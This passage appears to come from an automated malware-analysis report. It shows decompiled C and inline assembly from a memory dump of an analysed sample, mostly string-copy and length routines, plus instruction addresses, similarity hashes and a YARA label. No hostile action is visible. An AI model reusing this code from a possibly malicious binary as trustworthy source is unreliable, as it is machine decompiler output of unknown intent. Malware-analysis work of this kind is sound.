																if( *_t465 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L207;
														}
														_t299 = _v28;
														while(1) {
															__eflags =  *((char*)(_t461 + _t299));
															if( *((char*)(_t461 + _t299)) == 0) {
																break;
															}
															_t461 = _t461 + 1;
															__eflags = _t461 - 0x7fffffff;
															if(_t461 < 0x7fffffff) {
																continue;
															}
															goto L76;
														}
														L203:
														__eflags = _t461;
														if(__eflags == 0) {
															goto L76;
														}
														if(__eflags > 0) {
															goto L77;
														}
														_t466 = _v40;
														_t284 = _a4;
														goto L83;
													}
													asm("bsf esi, ebx");
													_t461 = _t461 + _t422;
													goto L203;
												}
												_t284 = _v28;
												_t422 = _t246;
												_t461 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t461 + _t284));
													if( *((char*)(_t461 + _t284)) == 0) {
														goto L203;
													}
													_t461 = _t461 + 1;
													__eflags = _t461 - _t246;
													if(_t461 < _t246) {
														continue;
													}
													goto L69;
												}
												goto L203;
												L207:
												_t357 = _v44;
												_t246 = _v32;
												__eflags = _t319;
											} while (_t319 != 0);
											goto L52;
										}
										goto L39;
									}
									_t279 =  *_t344;
									 *_t311 = _t279;
									__eflags = _t279;
									if(_t279 == 0) {
										goto L33;
									}
									_v60 = _t413;
									_t280 = 0;
									__eflags = 0;
									_v64 = _t283;
									_v68 = _t449;
									while(1) {
										_t280 = _t280 + 1;
										_t301 =  *((char*)(_t344 + _t280 * 2 - 1));
										 *(_t311 + _t280 * 2 - 1) = _t301;
										__eflags = _t301;
										if(_t301 == 0) {
											break;
										}
										_t302 =  *((char*)(_t344 + _t280 * 2));
										 *(_t311 + _t280 * 2) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											continue;
										}
										break;
									}
									_t413 = _v60;
									_t283 = _v64;
									_t449 = _v68;
									goto L33;
								}
							}
							_t311 = _v56;
							goto L36;
						}
						_t400 = _t406 & 0x0000000f;
						__eflags = _t400;
						if(_t400 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t308 =  ~( ~_t400 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t308;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t231;
								if(_t231 != 0) {
									break;
								}
								_t400 = _t400 + 0x10;
								__eflags = _t400 - _t308;
								if(_t400 < _t308) {
									continue;
								}
								__eflags = _t308 - 0x7fffffff;
								if(_t308 >= 0x7fffffff) {
									L21:
									_t310 = 0x40;
									_t283 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t308 + _t406));
									if( *((char*)(_t308 + _t406)) == 0) {
										break;
									}
									_t308 = _t308 + 1;
									__eflags = _t308 - 0x7fffffff;
									if(_t308 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L209:
								__eflags = _t283 - 0xfffffffe;
								if(_t283 != 0xfffffffe) {
									_t310 = 0x40;
								} else {
									 *_t406 = 0;
									_t310 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t283 = _t308 + _t400;
							goto L209;
						}
						_t283 = 0;
						_t400 =  ~_t400 + 0x10;
						__eflags = _t400;
						while(1) {
							__eflags =  *((char*)(_t283 + _t406));
							if( *((char*)(_t283 + _t406)) == 0) {
								goto L209;
							}
							_t283 = _t283 + 1;
							__eflags = _t283 - _t400;
							if(_t283 < _t400) {
								continue;
							}
							goto L15;
						}
						goto L209;
					}
					_t237 =  &_v56;
					goto L37;
				}
				if(_t406 == 0) {
					L6:
					_push(1);
					_push(_t230);
					E003B10B0();
					_t485 = _t485 + 8;
					goto L8;
				}
				_t402 =  *_t230;
				 *_t406 = _t402;
				if(_t402 == 0) {
					goto L6;
				}
				_t340 = 0;
				while(1) {
					_t340 = _t340 + 1;
					_t403 =  *((char*)(_t230 + _t340 * 2 - 1));
					 *((char*)(_t406 + _t340 * 2 - 1)) = _t403;
					if(_t403 == 0) {
						goto L6;
					}
					_t404 =  *((char*)(_t230 + _t340 * 2));
					 *((char*)(_t406 + _t340 * 2)) = _t404;
					if(_t404 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x003c2e6e
0x003c2e72
0x003c2e74
0x003c2e78
0x003c2e7f
0x003c2e81
0x003c2e84
0x003c2e8a
0x003c2ec1
0x003c2ec4
0x003c2ec4
0x003c2ec8
0x003c2ed0
0x003c2ed6
0x003c2ee1
0x003c2ee3
0x003c37d3
0x003c37d8
0x003c2f5d
0x003c2f62
0x003c2f62
0x003c2f65
0x003c2f68
0x003c2f6b
0x003c2f6d
0x003c2f82
0x003c2f85
0x003c2f85
0x003c2f8b
0x003c2f93
0x003c2f93
0x003c2f93
0x003c2f96
0x003c2f9d
0x003c2fa0
0x003c2fa6
0x003c2fa8
0x003c2fab
0x003c2faf
0x003c2fb1
0x003c3006
0x00000000
0x003c2fb3
0x003c2fb3
0x003c2fb5
0x003c2ff1
0x003c2ff1
0x003c2ff3
0x003c2ff4
0x003c2ff8
0x003c2ffd
0x003c3001
0x003c3009
0x003c3009
0x003c300d
0x003c3011
0x003c3015
0x003c3018
0x003c301e
0x003c3023
0x003c3023
0x003c3025
0x003c3029
0x003c302e
0x003c303d
0x003c303d
0x003c3041
0x003c3043
0x003c304b
0x003c304d
0x003c3050
0x003c3054
0x003c308e
0x003c3135
0x003c3135
0x003c3137
0x003c313e
0x003c313e
0x003c3140
0x003c3144
0x003c3150
0x003c3154
0x003c3161
0x003c3161
0x003c3058
0x003c307e
0x003c307e
0x003c3080
0x003c3081
0x003c3086
0x00000000
0x003c3086
0x003c305a
0x003c305d
0x003c3061
0x00000000
0x00000000
0x003c3063
0x003c3065
0x003c3065
0x003c3066
0x003c306b
0x003c3071
0x00000000
0x00000000
0x003c3073
0x003c3077
0x003c307c
0x00000000
0x00000000
0x00000000
0x003c307c
0x00000000
0x003c3065
0x003c3032
0x003c3035
0x003c303b
0x003c3096
0x003c3098
0x003c309c
0x003c309e
0x003c30e4
0x003c30e4
0x003c30e8
0x003c30ea
0x003c30f2
0x003c30f4
0x003c30f7
0x003c30f9
0x003c30fb
0x003c3132
0x00000000
0x003c3132
0x003c30fd
0x003c30ff
0x003c3125
0x003c3125
0x003c3127
0x003c3128
0x003c312d
0x00000000
0x003c312d
0x003c3101
0x003c3104
0x003c3106
0x003c3108
0x00000000
0x00000000
0x003c310a
0x003c310a
0x003c310c
0x003c310c
0x003c310d
0x003c3112
0x003c3116
0x003c3118
0x00000000
0x00000000
0x003c311a
0x003c311e
0x003c3121
0x003c3123
0x00000000
0x00000000
0x00000000
0x003c3123
0x00000000
0x003c310c
0x003c30a0
0x003c30a3
0x00000000
0x00000000
0x003c30a5
0x003c30a7
0x003c30a9
0x003c30a9
0x003c30ac
0x003c30b0
0x003c30b3
0x003c30b6
0x003c30b9
0x003c30bc
0x003c30bc
0x003c30be
0x003c30be
0x003c30c4
0x003c30ca
0x003c30cd
0x003c30cf
0x00000000
0x00000000
0x003c30d5
0x003c30d6
0x003c30d7
0x003c30db
0x003c30df
0x00000000
0x00000000
0x003c30e1
0x003c30e1
0x00000000
0x003c30e1
0x003c3164
0x003c3167
0x003c3169
0x00000000
0x00000000
0x003c3173
0x003c3176
0x003c3182
0x003c3182
0x003c3185
0x003c318c
0x003c3190
0x003c3192
0x003c3192
0x003c3194
0x003c3196
0x003c31af
0x003c31bf
0x003c31bf
0x003c31c5
0x003c31c5
0x003c31ca
0x003c31ce
0x003c31d2
0x003c31d4
0x00000000
0x00000000
0x003c31da
0x003c31dd
0x003c31df
0x00000000
0x00000000
0x003c31e5
0x003c31eb
0x003c3204
0x003c3204
0x003c3209
0x003c3209
0x003c320c
0x003c320c
0x003c320e
0x003c3212
0x003c3216
0x003c321a
0x003c3221
0x003c322a
0x003c322d
0x003c3230
0x003c3236
0x003c3239
0x003c323c
0x003c323e
0x00000000
0x00000000
0x003c324a
0x003c324c
0x003c3254
0x003c3254
0x003c3258
0x003c325c
0x003c325f
0x003c325f
0x003c3261
0x00000000
0x00000000
0x003c3267
0x003c326b
0x003c326b
0x003c326d
0x003c326f
0x003c326f
0x003c3270
0x00000000
0x00000000
0x003c3276
0x003c327a
0x00000000
0x00000000
0x003c3280
0x003c3289
0x003c328c
0x003c328f
0x003c3293
0x003c3297
0x003c3297
0x003c3298
0x003c3299
0x003c32a0
0x003c32a3
0x003c32a9
0x003c32ac
0x003c32ae
0x00000000
0x00000000
0x003c32b4
0x003c32b7
0x00000000
0x00000000
0x003c32b9
0x003c32b9
0x003c32bd
0x003c32c1
0x003c32c4
0x003c32c4
0x003c32c6
0x003c32df
0x003c32ef
0x003c32ef
0x003c32f5
0x003c32f5
0x003c32fa
0x003c32fe
0x003c3302
0x003c3304
0x00000000
0x00000000
0x003c330a
0x003c330d
0x003c330f
0x00000000
0x00000000
0x003c3311
0x003c3317
0x003c332c
0x003c332c
0x003c3331
0x003c3335
0x003c3335
0x003c3338
0x003c3350
0x003c3360
0x003c3360
0x003c3366
0x003c3366
0x003c336b
0x003c336f
0x003c3373
0x003c3375
0x00000000
0x00000000
0x003c337b
0x003c337e
0x003c3380
0x00000000
0x00000000
0x003c3382
0x003c3385
0x003c338b
0x003c33a0
0x003c33a0
0x003c33a5
0x003c33a5
0x003c33ab
0x003c33ad
0x003c33af
0x003c33b1
0x003c33b3
0x003c33b6
0x003c33b8
0x003c33bb
0x003c33be
0x003c33c0
0x003c33c0
0x003c33c2
0x003c33c6
0x003c3519
0x003c3519
0x003c3520
0x003c3522
0x003c3525
0x003c3527
0x003c3529
0x003c3563
0x00000000
0x003c3563
0x003c352b
0x003c352d
0x003c3553
0x003c3553
0x003c3555
0x003c3556
0x003c355b
0x00000000
0x003c355b
0x003c352f
0x003c3532
0x003c3534
0x003c3536
0x00000000
0x00000000
0x003c3538
0x003c3538
0x003c353a
0x003c353a
0x003c353b
0x003c3540
0x003c3544
0x003c3546
0x00000000
0x00000000
0x003c3548
0x003c354c
0x003c354f
0x003c3551
0x00000000
0x00000000
0x00000000
0x003c3551
0x00000000
0x003c353a
0x003c33cc
0x003c33d0
0x003c33d4
0x00000000
0x00000000
0x003c33da
0x003c33dc
0x003c3451
0x003c3456
0x003c3456
0x003c3459
0x003c345c
0x003c345f
0x003c3461
0x003c3477
0x003c347a
0x003c347a
0x003c3480
0x003c3488
0x003c3488
0x003c3488
0x003c348b
0x003c3495
0x003c3498
0x003c349b
0x003c34a1
0x003c34a3
0x003c34a6
0x003c34a8
0x003c34aa
0x003c34e4
0x00000000
0x003c34ac
0x003c34ac
0x003c34ae
0x003c34d7
0x003c34d7
0x003c34d9
0x003c34da
0x003c34df
0x003c34e7
0x003c34ea
0x003c34ed
0x003c34ef
0x003c34ef
0x003c34f1
0x00000000
0x00000000
0x003c34f7
0x003c34fb
0x003c3501
0x003c3501
0x003c3504
0x003c3505
0x003c3507
0x003c3509
0x00000000
0x00000000
0x003c350b
0x003c350d
0x003c356b
0x00000000
0x003c356b
0x003c350f
0x003c350f
0x003c3511
0x00000000
0x00000000
0x003c34ff
0x003c3500
0x003c3500
0x003c3500
0x003c3501
0x003c34b0
0x003c34b3
0x003c34b5
0x003c34b7
0x00000000
0x00000000
0x003c34b9
0x003c34b9
0x003c34bb
0x003c34bb
0x003c34bc
0x003c34c1
0x003c34c5
0x003c34c7
0x00000000
0x00000000
0x003c34c9
0x003c34cd
0x003c34d0
0x003c34d2
0x00000000
0x00000000
0x00000000
0x003c34d2
0x003c34d4
0x00000000
0x003c34d4
0x003c34aa
0x003c3463
0x00000000
0x003c3463
0x003c33de
0x003c33e0
0x003c33e4
0x003c33e4
0x003c33e7
0x003c33ff
0x003c340f
0x003c340f
0x003c3415
0x003c3415
0x003c341a
0x003c341e
0x003c3422
0x003c3424
0x00000000
0x00000000
0x003c342a
0x003c342d
0x003c342f
0x00000000
0x00000000
0x003c3431
0x003c3437
0x003c344c
0x003c344c
0x00000000
0x003c344c
0x003c3439
0x003c343d
0x003c343d
0x003c3441
0x00000000
0x00000000
0x003c3443
0x003c3444
0x003c344a
0x00000000
0x00000000
0x00000000
0x003c344a
0x00000000
0x003c343d
0x003c3574
0x003c3577
0x00000000
0x003c3577
0x003c33eb
0x003c33ed
0x003c33f1
0x003c33f1
0x003c33f4
0x003c33f4
0x003c33f8
0x00000000
0x00000000
0x003c33fa
0x003c33fb
0x003c33fd
0x00000000
0x00000000
0x00000000
0x003c33fd
0x00000000
0x003c33f4
0x003c338d
0x003c3391
0x003c3391
0x003c3395
0x00000000
0x00000000
0x003c3397
0x003c3398
0x003c339e
0x00000000
0x00000000
0x00000000
0x003c339e
0x00000000
0x003c3391
0x003c357e
0x003c3581
0x003c3584
0x00000000
0x003c3584
0x003c333c
0x003c333e
0x003c3342
0x003c3342
0x003c3345
0x003c3345
0x003c3349
0x00000000
0x00000000
0x003c334b
0x003c334c
0x003c334e
0x00000000
0x00000000
0x00000000
0x003c334e
0x00000000
0x003c3345
0x003c3319
0x003c331d
0x003c331d
0x003c3321
0x00000000
0x00000000
0x003c3323
0x003c3324
0x003c332a
0x00000000
0x00000000
0x00000000
0x003c332a
0x00000000
0x003c331d
0x003c358b
0x003c358e
0x00000000
0x003c358e
0x003c32c8
0x003c32cc
0x003c32cc
0x003c32ce
0x003c32d2
0x003c32d4
0x003c32d4
0x003c32d8
0x00000000
0x00000000
0x003c32da
0x003c32db
0x003c32dd
0x00000000
0x00000000
0x00000000
0x003c32dd
0x00000000
0x003c32d4
0x003c3595
0x003c3599
0x003c359d
0x003c359f
0x00000000
0x00000000
0x003c35a5
0x003c35a9
0x003c35ad
0x003c35b1
0x003c35b5
0x003c35b5
0x003c35b7
0x003c35b9
0x003c35d2
0x003c35e2
0x003c35e2
0x003c35e8
0x003c35e8
0x003c35ed
0x003c35f1
0x003c35f5
0x003c35f7
0x00000000
0x00000000
0x003c35fd
0x003c3600
0x003c3602
0x00000000
0x00000000
0x003c3608
0x003c360e
0x003c3627
0x003c3627
0x003c362c
0x003c362c
0x003c362f
0x003c362f
0x003c3631
0x003c3635
0x003c3639
0x003c363d
0x003c3644
0x003c364d
0x003c3650
0x003c3653
0x003c3659
0x003c365c
0x003c365f
0x003c3661
0x00000000
0x00000000
0x003c3665
0x003c3667
0x003c3673
0x003c3673
0x003c3677
0x003c367b
0x003c367b
0x003c367d
0x00000000
0x00000000
0x00000000
0x003c367d
0x003c3669
0x003c366a
0x003c366d
0x00000000
0x00000000
0x00000000
0x003c366d
0x003c368f
0x003c3699
0x003c3699
0x003c369a
0x00000000
0x00000000
0x003c369c
0x003c36a5
0x003c36aa
0x003c36ad
0x003c36b1
0x00000000
0x00000000
0x003c36b3
0x003c36b7
0x003c36b7
0x003c36b8
0x003c36b9
0x003c36c3
0x003c36c9
0x003c36cc
0x003c36ce
0x00000000
0x00000000
0x003c36d0
0x003c36d3
0x00000000
0x00000000
0x00000000
0x003c36d5
0x00000000
0x003c36b7
0x003c3610
0x003c3614
0x003c3614
0x003c3618
0x00000000
0x00000000
0x003c361e
0x003c361f
0x003c3625
0x00000000
0x00000000
0x00000000
0x003c3625
0x003c36fa
0x003c36fa
0x003c36fc
0x00000000
0x00000000
0x003c3702
0x00000000
0x00000000
0x003c3708
0x003c370c
0x003c3710
0x00000000
0x003c3710
0x003c3719
0x003c3720
0x00000000
0x003c3720
0x003c35bb
0x003c35bf
0x003c35c1
0x003c35c1
0x003c35c3
0x003c35c3
0x003c35c7
0x00000000
0x00000000
0x003c35cd
0x003c35ce
0x003c35d0
0x00000000
0x00000000
0x00000000
0x003c35d0
0x00000000
0x003c36de
0x003c36de
0x003c36e2
0x003c36e6
0x003c36e6
0x003c36ee
0x003c36ee
0x003c36f2
0x00000000
0x003c36f2
0x003c3683
0x003c3683
0x00000000
0x003c3687
0x003c324e
0x003c324f
0x003c3252
0x00000000
0x00000000
0x00000000
0x003c3252
0x003c3724
0x003c372e
0x003c372e
0x003c372f
0x00000000
0x00000000
0x003c3735
0x003c373e
0x003c3743
0x003c3746
0x003c374a
0x00000000
0x00000000
0x003c3750
0x003c3754
0x003c3754
0x003c3755
0x003c3756
0x003c3760
0x003c3766
0x003c3769
0x003c376b
0x00000000
0x00000000
0x003c376d
0x003c3770
0x00000000
0x00000000
0x00000000
0x003c3772
0x00000000
0x003c3754
0x003c31ed
0x003c31f1
0x003c31f1
0x003c31f5
0x00000000
0x00000000
0x003c31fb
0x003c31fc
0x003c3202
0x00000000
0x00000000
0x00000000
0x003c3202
0x003c3777
0x003c3777
0x003c3779
0x00000000
0x00000000
0x003c377f
0x00000000
0x00000000
0x003c3785
0x003c3789
0x00000000
0x003c3789
0x003c3791
0x003c3798
0x00000000
0x003c3798
0x003c3198
0x003c319c
0x003c319e
0x003c319e
0x003c31a0
0x003c31a0
0x003c31a4
0x00000000
0x00000000
0x003c31aa
0x003c31ab
0x003c31ad
0x00000000
0x00000000
0x00000000
0x003c31ad
0x00000000
0x003c379c
0x003c379c
0x003c37a0
0x003c37a4
0x003c37a4
0x00000000
0x003c37ac
0x00000000
0x003c303b
0x003c2fb7
0x003c2fba
0x003c2fbc
0x003c2fbe
0x00000000
0x00000000
0x003c2fc0
0x003c2fc4
0x003c2fc4
0x003c2fc6
0x003c2fca
0x003c2fcd
0x003c2fcd
0x003c2fce
0x003c2fd3
0x003c2fd7
0x003c2fd9
0x00000000
0x00000000
0x003c2fdb
0x003c2fdf
0x003c2fe2
0x003c2fe4
0x00000000
0x00000000
0x00000000
0x003c2fe4
0x003c2fe6
0x003c2fea
0x003c2fee
0x00000000
0x003c2fee
0x003c2fb1
0x003c2f6f
0x00000000
0x003c2f6f
0x003c2eeb
0x003c2eeb
0x003c2eee
0x003c2f06
0x003c2f0a
0x003c2f16
0x003c2f16
0x003c2f1c
0x003c2f1c
0x003c2f21
0x003c2f25
0x003c2f29
0x003c2f2b
0x00000000
0x00000000
0x003c2f31
0x003c2f34
0x003c2f36
0x00000000
0x00000000
0x003c2f38
0x003c2f3e
0x003c2f53
0x003c2f53
0x003c2f58
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2f40
0x003c2f40
0x003c2f40
0x003c2f44
0x00000000
0x00000000
0x003c2f4a
0x003c2f4b
0x003c2f51
0x00000000
0x00000000
0x00000000
0x003c2f51
0x003c37b1
0x003c37b1
0x003c37b4
0x003c37c2
0x003c37b6
0x003c37b6
0x003c37b9
0x003c37b9
0x00000000
0x003c37b4
0x003c37cc
0x003c37cf
0x00000000
0x003c37cf
0x003c2ef2
0x003c2ef4
0x003c2ef4
0x003c2ef7
0x003c2ef7
0x003c2efb
0x00000000
0x00000000
0x003c2f01
0x003c2f02
0x003c2f04
0x00000000
0x00000000
0x00000000
0x003c2f04
0x00000000
0x003c2ef7
0x003c2ed8
0x00000000
0x003c2ed8
0x003c2e8e
0x003c2eb4
0x003c2eb4
0x003c2eb6
0x003c2eb7
0x003c2ebc
0x00000000
0x003c2ebc
0x003c2e90
0x003c2e93
0x003c2e97
0x00000000
0x00000000
0x003c2e99
0x003c2e9b
0x003c2e9b
0x003c2e9c
0x003c2ea1
0x003c2ea7
0x00000000
0x00000000
0x003c2ea9
0x003c2ead
0x003c2eb2
0x00000000
0x00000000
0x00000000
0x003c2eb2
0x00000000

Strings

@, xrefs: 003C2EC8

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: 9856ddca2f45872af2f554c414e536d743d03d88bd613f77fb4bc2b4de47e447
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: FD5229719093928BC717CE29C480B2ABBE26FC5314F2EC65DD895DB296DA31DE418782

Uniqueness

Uniqueness Score: -1.00%

Function 003BD030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003BD030(void* __ecx, signed int* _a4) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _t225;
				signed int _t230;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				unsigned int _t267;
				signed int _t272;
				signed int _t277;
				unsigned int _t283;
				signed int _t284;
				signed int* _t286;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t304;
				unsigned int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E003BD980(__ecx,  &_v60, 0x2f);
				_t294 = E003BE7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E003B1030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E003B1030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E003B10B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E003B10B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E003B87E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E003B87E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E003B87E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E003B10B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E003B1030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E003B10B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
